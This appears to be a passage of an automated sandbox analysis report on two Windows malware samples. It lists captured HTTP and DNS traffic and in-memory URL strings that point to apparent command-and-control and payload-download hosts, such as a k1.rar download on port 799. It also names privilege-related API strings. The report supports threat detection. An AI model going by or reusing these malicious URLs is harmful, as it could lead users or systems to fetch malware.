Source: global traffic HTTP traffic detected: GET /images/xs.jpg?ad5654=34079484 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=23c464339208da2a95574fbd506ebd72|8.46.123.33|1720159204|1720159204|0|1|0
Source: global traffic HTTP traffic detected: GET /xs.jpg?c12b4b=126595310 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=f61c3ab837e78a3dbee4d750570963c6|8.46.123.33|1720159205|1720159205|0|1|0
Source: global traffic HTTP traffic detected: GET /images/xs.jpg?ce2fff=121614327 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=a1590c081175a697dce15a514e641dbf|8.46.123.33|1720159206|1720159206|0|1|0; snkz=8.46.123.33
Source: global traffic HTTP traffic detected: GET /xs.jpg?e14213=73812575 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /images/xs2.jpg?f4c967=160423430 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: ddos.dnsnb8.net
Source: global traffic DNS traffic detected: DNS query: althawry.org
Source: global traffic DNS traffic detected: DNS query: www.careerdesk.org
Source: global traffic DNS traffic detected: DNS query: arthur.niria.biz
Source: global traffic DNS traffic detected: DNS query: amsamex.com
Source: global traffic DNS traffic detected: DNS query: apple-pie.in
Source: global traffic DNS traffic detected: DNS query: ahmediye.net
Source: global traffic DNS traffic detected: DNS query: g2.arrowhitech.com
Source: global traffic DNS traffic detected: DNS query: ampyazilim.com.tr
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:00:07 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:00:11 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
Source: rksowY.exe, 00000002.00000003.2147302621.00000000007F0000.00000004.00001000.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000401000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://127.0.0.1/R2_2021/ServerInfo.json
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://173.193.19.14/logo.gif
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://89.119.67.154/testo5/
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gif
Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://a3inforservice.com.br/images/logof.gif
Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://accnet.ca/xs.jpg
Source: 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://accnet.ca/xs.jpghttp://a3inforservice.com.br/images/logof.gif
Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://ahmediye.net/xs.jpg
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ahmediye.net/xs.jpg?5827cf=5777359
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ahmediye.net/xs.jpg?5827cf=5777359V
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2255038602.0000000007591000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.00000000075F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ahmediye.net/xs.jpg?e14213=73812575
Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://althawry.org/images/xs.jpg
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://althawry.org/images/xs.jpg?4f8fad=26070625
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://althawry.org/images/xs.jpg?4f8fad=260706254
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://althawry.org/images/xs.jpg?4f8fad=26070625d
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://althawry.org/images/xs.jpg?a6d450=65599968
Source: 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://althawry.org/images/xs.jpghttp://www.careerdesk.org/images/xs.jpghttp://arthur.niria.biz/xs.j
Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg
Source: 1.0.0.2.exe, 00000000.00000003.2255038602.000000000760A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000760A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?1
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?1.
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000111D000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?6cbf0c=21380388
Source: 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430
Source: 1.0.0.2.exe, 00000000.00000003.2255294960.000000000761C000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430M
Source: 1.0.0.2.exe, 00000000.00000002.2273488135.00000000075F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430ed
Source: 1.0.0.2.exe, 00000000.00000003.2255038602.0000000007591000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.00000000075F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430ed;0
Source: 1.0.0.2.exe, 00000000.00000003.2255038602.0000000007591000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.00000000075F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430edK2
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430ellNoRoam
Source: 1.0.0.2.exe, 00000000.00000003.2255294960.000000000761C000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430j
Source: 1.0.0.2.exe, 00000000.00000003.2255294960.000000000761C000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430x
Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://amsamex.com/xs.jpg
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://amsamex.com/xs.jpg?549590=27716560
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://amsamex.com/xs.jpg?ce2fff=94588921
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://amsamex.com/xs.jpg?ce2fff=945889216
Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://apple-pie.in/images/xs.jpg
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apple-pie.in/images/xs.jpg?554c8c=39131092
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apple-pie.in/images/xs.jpg?ce2fff=121614327
Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://arthur.niria.biz/xs.jpg
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://arthur.niria.biz/xs.jpg?51fbda=48356010
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://arthur.niria.biz/xs.jpg?51fbda=483560101
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://arthur.niria.biz/xs.jpg?51fbda=48356010a
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://arthur.niria.biz/xs.jpg?c12b4b=126595310
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://arthur.niria.biz/xs.jpg?c12b4b=126595310C
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://arthur.niria.biz/xs.jpg?c12b4b=126595310T
Source: rksowY.exe, 00000002.00000003.2179982958.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net/
Source: rksowY.exe, 00000002.00000002.2255119471.00000000028CA000.00000004.00000010.00020000.00000000.sdmp, rksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2243579607.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2243579607.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: rksowY.exe, 00000002.00000002.2243579607.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar4
Source: rksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar6
Source: rksowY.exe, 00000002.00000002.2243579607.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar9
Source: rksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarL
Source: rksowY.exe, 00000002.00000002.2255119471.00000000028CA000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarp
Source: rksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2243579607.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rars
Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://g2.arrowhitech.com/xs.jpg
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://g2.arrowhitech.com/xs.jpg?6bfcc6=28308248
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://g2.arrowhitech.com/xs.jpg?6bfcc6=28308248jh7
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060&o
Source: 1.0.0.2.exe, 00000000.00000003.2255038602.000000000760A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000760A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060-
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060704hM
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=1603540608oI
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060Nh
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060xoP
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://kukutrustnet777.info/home.gif
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://kukutrustnet777888.info/
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://kukutrustnet777888.info/DisableTaskMgrSoftware
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://kukutrustnet888.info/home.gif
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://kukutrustnet987.info/home.gif
Source: 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000C69000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://pan.baidu.com/s/1qWKD5ve
Source: Amcache.hve.2.dr String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.2.dr String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.2.dr String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.2.dr String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.2.dr String found in binary or memory: http://www.baanboard.comBrendon
